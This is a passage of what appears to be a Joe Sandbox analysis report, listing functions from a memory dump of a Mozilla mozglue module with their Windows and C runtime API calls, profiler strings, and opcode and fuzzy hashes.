malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,66628242,?,00000000,?,6661B63F), ref: 666291BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,66628242,?,00000000,?,6661B63F), ref: 666291EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,66628242,?,00000000,?,6661B63F), ref: 66629200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,66628242,?,00000000,?,6661B63F), ref: 66629219

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 21fd723ec572111bf6ecf15c22962598b70bd17274632be6c58ba45cada4d3ff
Instruction ID: f4de214aaea68ae32be5398de41a22501f64f4ac81fa43af510fecfab006b77f
Opcode Fuzzy Hash: 21fd723ec572111bf6ecf15c22962598b70bd17274632be6c58ba45cada4d3ff
Instruction Fuzzy Hash: DF3124B1A116058BEB00CF7AEC497AA77AEEFC1309F414629D85AD7240EB31D854CBA1

Function 66610800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665E7DC), ref: 66610838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6661084C
EnterCriticalSection.KERNEL32(?), ref: 666108AF
LeaveCriticalSection.KERNEL32(?), ref: 666108BD
LeaveCriticalSection.KERNEL32(6665E7DC), ref: 666108D5

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: 6a03955a6278e8fe4f46ad02d83155a2eb783940e5d7db3cbf8ccd09556a7895
Instruction ID: 5b9b02914caca10b213532c7b4d218ab4024fcc3e789636a6aed0c994ffeef2a
Opcode Fuzzy Hash: 6a03955a6278e8fe4f46ad02d83155a2eb783940e5d7db3cbf8ccd09556a7895
Instruction Fuzzy Hash: 63210730A08249ABEF44CF69FC45BAEB77ABF84744F400068E609A7241DF31A810CBD4

Function 6662CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6661DA31,00100000,?,?,00000000,?), ref: 6662CDA4

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

Part of subcall function 6662D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6662CDBA,00100000,?,00000000,?,6661DA31,00100000,?,?,00000000,?), ref: 6662D158
Part of subcall function 6662D130: InitializeConditionVariable.KERNEL32(00000098,?,6662CDBA,00100000,?,00000000,?,6661DA31,00100000,?,?,00000000,?), ref: 6662D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6661DA31,00100000,?,?,00000000,?), ref: 6662CDC4

Part of subcall function 66627480: ReleaseSRWLockExclusive.KERNEL32(?,666315FC,?,?,?,?,666315FC,?), ref: 666274EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6661DA31,00100000,?,?,00000000,?), ref: 6662CECC

Part of subcall function 665ECA10: mozalloc_abort.MOZGLUE(?), ref: 665ECAA2

Part of subcall function 6661CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6662CEEA,?,?,?,?,00000000,?,6661DA31,00100000,?,?,00000000), ref: 6661CB57
Part of subcall function 6661CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6661CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6662CEEA,?,?), ref: 6661CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6661DA31,00100000,?,?,00000000,?), ref: 6662D058

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 496f07a3345231076e51f4ba59ae6f82791c1f0e5c024d136fd93b1661c5228d
Instruction ID: 5c1f9b6d4527500cce5eb5190000da4e2c426bf734957caaf3effa595903667c
Opcode Fuzzy Hash: 496f07a3345231076e51f4ba59ae6f82791c1f0e5c024d136fd93b1661c5228d
Instruction Fuzzy Hash: A3D17071A04B069FD748CF28D580799FBE1BF99304F01862DD9598B252EB31E9A5CFC1

Function 665E1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 665E17B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 665E18EE
free.MOZGLUE(?), ref: 665E1911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 665E194C

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: dd39560b32f309cfe77570a65791a7cf913662401aaa51438a060d1028460b5a
Instruction ID: 6a9f8f6c2c826265346724aa6fb9f980ab17bf373812547d21e4f1886f0acf7c
Opcode Fuzzy Hash: dd39560b32f309cfe77570a65791a7cf913662401aaa51438a060d1028460b5a
Instruction Fuzzy Hash: AF81B070E142159FDF18CF68D8969AEBBB2FF89310F04456CE851AB354DB30A954CBA2

Function 665F5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 665F5D40
EnterCriticalSection.KERNEL32(6665F688), ref: 665F5D67
__aulldiv.LIBCMT ref: 665F5DB4
LeaveCriticalSection.KERNEL32(6665F688), ref: 665F5DED

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 201a467e4a81dcacd40018ced09573b3e53c116a8834b8427bc4453fbf0b54f4
Instruction ID: 67e1ffdfc5fea63cbff909485d274a4d0a68f5d43136e51bed4e2805fba5fc75
Opcode Fuzzy Hash: 201a467e4a81dcacd40018ced09573b3e53c116a8834b8427bc4453fbf0b54f4
Instruction Fuzzy Hash: 67518E71E012698FCF08CF69C856AAEBBB3FBD5304F158619D951A7350C7306946CF90

Function 66637170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 66637250
EnterCriticalSection.KERNEL32(6665F688), ref: 66637277
__aulldiv.LIBCMT ref: 666372C4
LeaveCriticalSection.KERNEL32(6665F688), ref: 666372F7

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: f87d0d6cf7a4cbebb9e2324922e2d92bc6d3d25abf35c4e31a21f8b1f17b0a7a
Instruction ID: b785ee8131528f49c4041e755ea6251e899f329168681c54260a5d9bd7150e8e
Opcode Fuzzy Hash: f87d0d6cf7a4cbebb9e2324922e2d92bc6d3d25abf35c4e31a21f8b1f17b0a7a
Instruction Fuzzy Hash: D7513971E00239CFDF08CFAAD952AAEBBB2BB89300F158629D955B7350C7316945CB94

Function 665DCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 665DCEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 665DCEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 665DCF4E

Strings

0, xrefs: 665DCF30

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 2ce2bf1553a7c9d79b33e4603a79b261294ea26914559c9ab18a90bad303626c
Instruction ID: f0f91be130468b3ba5cc85a6748531b67b3128da6a5abeaf583119ed23c3e870
Opcode Fuzzy Hash: 2ce2bf1553a7c9d79b33e4603a79b261294ea26914559c9ab18a90bad303626c
Instruction Fuzzy Hash: A6510175A002568FCB05CF1CC890AAAFBA5EF99300F19859DD8595F392D731ED06CBE0

Function 6661E390 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6661E3E4
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6661E4AB

Part of subcall function 665E5D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6661D2DA,00000001), ref: 665E5D66

ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661E4F5
GetCurrentThreadId.KERNEL32 ref: 6661E577
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661E584
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661E5DE
memset.VCRUNTIME140(?,00000000,00000000), ref: 6661E6DA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6661E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6661E883
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6661E8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6661E826, 6661E850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6661E777
MOZ_PROFILER_STARTUP, xrefs: 6661E5A1, 6661E5CC, 6661E5FF, 6661E62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6661E655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6661E722, 6661E750, 6661E7A2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 905598890-53385798
Opcode ID: df216ee09e4998d9a724055d46ce7e444d941f5319447cd036924818e8d9a6c7
Instruction ID: e5ca70711c890341553bdb24fd31eca452f2927d513457173157b70a24d9bdc3
Opcode Fuzzy Hash: df216ee09e4998d9a724055d46ce7e444d941f5319447cd036924818e8d9a6c7
Instruction Fuzzy Hash: 0F418B74A00656CFDB18CF2DE491AAABBB2FF8A304F00816DD9569BB41D734E851CF90

Function 666377D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 666377FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 66637829

Part of subcall function 6660CC38: GetCurrentProcess.KERNEL32(?,?,?,?,665D31A7), ref: 6660CC45
Part of subcall function 6660CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,665D31A7), ref: 6660CC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6663789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 666378CF

Part of subcall function 665D4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 665D4E5A
Part of subcall function 665D4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 665D4E97

Part of subcall function 665D4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(66613EBD,66613EBD,00000000), ref: 665D42A9

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: 2123dfce41079611f41885faa4c9829bbef53bc28c5d06c5d51892bf0c00e8a0
Instruction ID: e0f68c63677796be6ffe465a8eb1f3032a763d4835dfe02054445685fc33ed3b
Opcode Fuzzy Hash: 2123dfce41079611f41885faa4c9829bbef53bc28c5d06c5d51892bf0c00e8a0
Instruction Fuzzy Hash: 1741C1719047469FD300DF29D88052AFBF5FFCA214F604A2EE4A987280DB30E955CBD6

Function 6662DAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6662DB86
??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6662DC0E
free.MOZGLUE(?), ref: 6662DC2E
free.MOZGLUE(?), ref: 6662DC40

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Impl@detail@mozilla@@Mutexfree
String ID:
API String ID: 3186548839-0
Opcode ID: 26cc96d3aaf7092fb601622f5282d2f51acf3cd8fe8eb43f16c7b8243313796c
Instruction ID: b5f580e284b9b44dd9b1e64a2783c474e40d7de18c26d521101e8c98d5679072
Opcode Fuzzy Hash: 26cc96d3aaf7092fb601622f5282d2f51acf3cd8fe8eb43f16c7b8243313796c
Instruction Fuzzy Hash: F84167B5A047018FC714CF35D498A6ABBFABFC8254F55886DE99A87340EB31E844CF91

Function 66616470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,666182BC,?,?), ref: 6661649B

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 666164A9

Part of subcall function 6660FA80: GetCurrentThreadId.KERNEL32 ref: 6660FA8D
Part of subcall function 6660FA80: AcquireSRWLockExclusive.KERNEL32(6665F448), ref: 6660FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6661653F
free.MOZGLUE(?), ref: 6661655A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: cc2f4fc39375fb9ee24c1adbd9839ca820e247e236b05e8fa13ae3d799b4c846
Instruction ID: b763ee9f603a75cd70e9ef5ca341a2997bafa635a0bd37ed9f1502034d1df769
Opcode Fuzzy Hash: cc2f4fc39375fb9ee24c1adbd9839ca820e247e236b05e8fa13ae3d799b4c846
Instruction Fuzzy Hash: 09316FB5A083159FDB04CF25E880A5BBBE5BF99314F40842EE95A97341DB30E919CBD2

Function 6662A2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6662A315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6662A31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6662A36A

Part of subcall function 665F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 665F5EDB
Part of subcall function 665F5E90: memset.VCRUNTIME140(ewcf,000000E5,?), ref: 665F5F27
Part of subcall function 665F5E90: LeaveCriticalSection.KERNEL32(?), ref: 665F5FB2

Part of subcall function 66622140: free.MOZGLUE(?,00000060,?,66627D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6662215D

free.MOZGLUE(00000000), ref: 6662A37C

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: d6f180c130d69c0b1ad585e0d943847f55a1c7727d71de99ea1e42d46cf775f2
Instruction ID: e33351e5202abcf42347f9ba43d5bffd02b3dbb716487d54576a7088a4fb71d3
Opcode Fuzzy Hash: d6f180c130d69c0b1ad585e0d943847f55a1c7727d71de99ea1e42d46cf775f2
Instruction Fuzzy Hash: 6D21A775A002249BDB159F05E840B9EBFADFF89764F458055DE099B300D772ED02CED5

Function 6660FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6662D019,?,?,?,?,?,00000000,?,6661DA31,00100000,?), ref: 6660FFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6662D019,?,?,?,?,?,00000000,?,6661DA31,00100000,?,?), ref: 6660FFF5
free.MOZGLUE(?,?,?,?,?,6662D019,?,?,?,?,?,00000000,?,6661DA31,00100000,?), ref: 6661001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6662D019,?,?,?,?,?,00000000,?,6661DA31,00100000,?,?), ref: 6661002A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: 9503ea44717fc06aeea8310c351bf3b6e12199df1bc113efb42db07aab6e9553
Instruction ID: fe4f273290c838be5bd6c001ec1c8e54b2895b9ace3dfafdc9bde00d276b49d9
Opcode Fuzzy Hash: 9503ea44717fc06aeea8310c351bf3b6e12199df1bc113efb42db07aab6e9553
Instruction Fuzzy Hash: 8A21D3B2E002155FDB089E7CEC9586FBBBAEAC52247254338E925D7380EA71AD01C6D5

Function 66621B80 Relevance: 6.1, APIs: 4, Instructions: 77threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 66621B98
AcquireSRWLockExclusive.KERNEL32(?,?,66621D96,00000000), ref: 66621BA1
ReleaseSRWLockExclusive.KERNEL32(?,?,66621D96,00000000), ref: 66621BB5
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 66621C25

Part of subcall function 66621C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6662759E,?,?), ref: 66621CB4

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
String ID:
API String ID: 3699359333-0
Opcode ID: 11debbd7ae6155c1c68d20e3e9ceb5222b9766608f8f2ed13d406a3fe58d3749
Instruction ID: 93953ad5dfbb21d2d1b3c9a3d6ad706389c915dc39f82b50539971ad2ea8ce5a
Opcode Fuzzy Hash: 11debbd7ae6155c1c68d20e3e9ceb5222b9766608f8f2ed13d406a3fe58d3749
Instruction Fuzzy Hash: F621B074A082158FDB049F25E8857AFFFBDAB96755F004429DB125B341D77A9801CFD0

Function 66637B10 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 66637B51
__aulldiv.LIBCMT ref: 66637B6C
__aulldiv.LIBCMT ref: 66637B8B
__aulldiv.LIBCMT ref: 66637BB1

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction ID: 04533266eadad8a5c7691ae6f96f6048db68610399ae4f943894afe59323d545
Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction Fuzzy Hash: 1F2160B1B00609AFD714CF7DDC81E67BBF8EB89714B10857DE41ADB340E674A8008BA4

Function 6663AAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6663AAF8
EnterCriticalSection.KERNEL32(6665F770,?,665FBF9F), ref: 6663AB08
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,665FBF9F), ref: 6663AB39
